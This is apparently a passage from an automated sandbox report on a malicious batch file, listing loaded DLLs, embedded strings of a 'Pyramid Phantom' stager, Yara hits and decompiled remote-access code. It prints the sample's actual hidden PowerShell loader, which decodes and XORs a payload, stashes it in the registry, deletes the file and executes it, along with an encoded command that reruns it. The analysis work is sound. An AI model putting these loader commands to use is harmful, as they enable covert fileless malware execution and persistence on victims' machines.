                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: georgefloyd.batStatic file information: File size 4474706 > 1048576
                Source: Binary string: <>c__DisplayClass6_0<>9__0<Main>b__0IEnumerable`1List`1ReadInt32Dictionary`2ReadInt16get_UTF8<Module>CreateFileAGetUACPAGE_EXECUTE_READWRITEQxwgIQJtuynihFkPbNFN<>OMODULEINFOSystem.IOAESbavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkUJmjvFFFlvXCosturacostura.metadatamscorlibSystem.Collections.GenericsrcReadThreadLoadGetPayloadAddAesManagedisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.ja.microsoft.win32.taskscheduler.resources.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.tr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.sv.microsoft.win32.taskscheduler.resources.dll.compressedisElevatedEncodeCommandGetMethodsubscribeReplaceTaskServiceGetResourceset_ModeshareModePaddingModeCompressionModeCipherModeget_UnicodeSizeOfImageget_MessageExchangenullCacheInvokeEnumerableIDisposableGetModuleHandleCloseHandlehandletemplateFileMapViewOfFilefileIsInRoleWindowsBuiltInRoleConsolehModulemoduleget_NameprocNameGetAssemblyResourceNamelpFileNamefileNamemoduleNameget_FullNamefullNameGetNamerequestedAssemblyNamenameReadLineWriteLineValueTypeGetTypeSystem.CorecultureMethodBaseDisposeElevateWriteCompilerGeneratedAttributeGuidAttributeUnverifiableCodeAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeReadByte_GetConfigValueTryGetValueadd_AssemblyResolveget_SizedwSizesizePyramid.Phantom.Stager.ConfigconfigSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningCreateFileMappingFromBase64StringToBase64StringCultureToStringGetStringAttachmaximumSizeHighfileOffsetHighget_LengthEndsWithnullCacheLockTransformFinalBlockUnhookNewTaskFiTaMpiODlMarshalSystem.Security.Principalget_PrincipalTaskPrincipalWindowsPrincipalset_RunLevelTaskRunLevelBaseOfDllUnhookDllkernel32.dllpsapi.dllmsvcrt.dllReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramset_ItemOperatingSystemSymmetricAlgorithmICryptoTransformset_HiddenMainAppDomainget_CurrentDomainget_OSVersionget_VersionFodyVersionSystem.IO.CompressionGetModuleInformationdestinationSystem.GlobalizationExecActionSystem.ReflectionActionCollectionTriggerCollectionRegisterTaskDefinitionset_PositioncreationDispositionExceptionS
                Source: Binary string: C:\Users\dahal\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdbSHA256 source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: costura.costura.pdb.compressed source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2718136098.0000024310CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.000002281B5C4000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: costura.costura.pdb.compressed8 source: powershell.exe, 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|806F4C19B2D7FD9E3B836269EC07647019A29E95|7960 source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2718136098.0000024310CFB000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahal\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 3.2.powershell.exe.24311715540.7.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs.Net Code: Memory
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs.Net Code: Memory
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"Jump to behavior
                Source: Yara matchFile source: 3.2.powershell.exe.24311715540.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.24311023810.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.24310fe37d8.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.243110a3848.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.24311715540.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.24311023810.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.243110a3848.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.24310fe37d8.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1553871152.000002281B5C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2718136098.0000024310CFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\D7AEA3DBB334FF534DC1 9BCF8DFC92BC643B9414A446DA4632050DE1B7577FEDF4F7711D3B4B3D46E06DJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
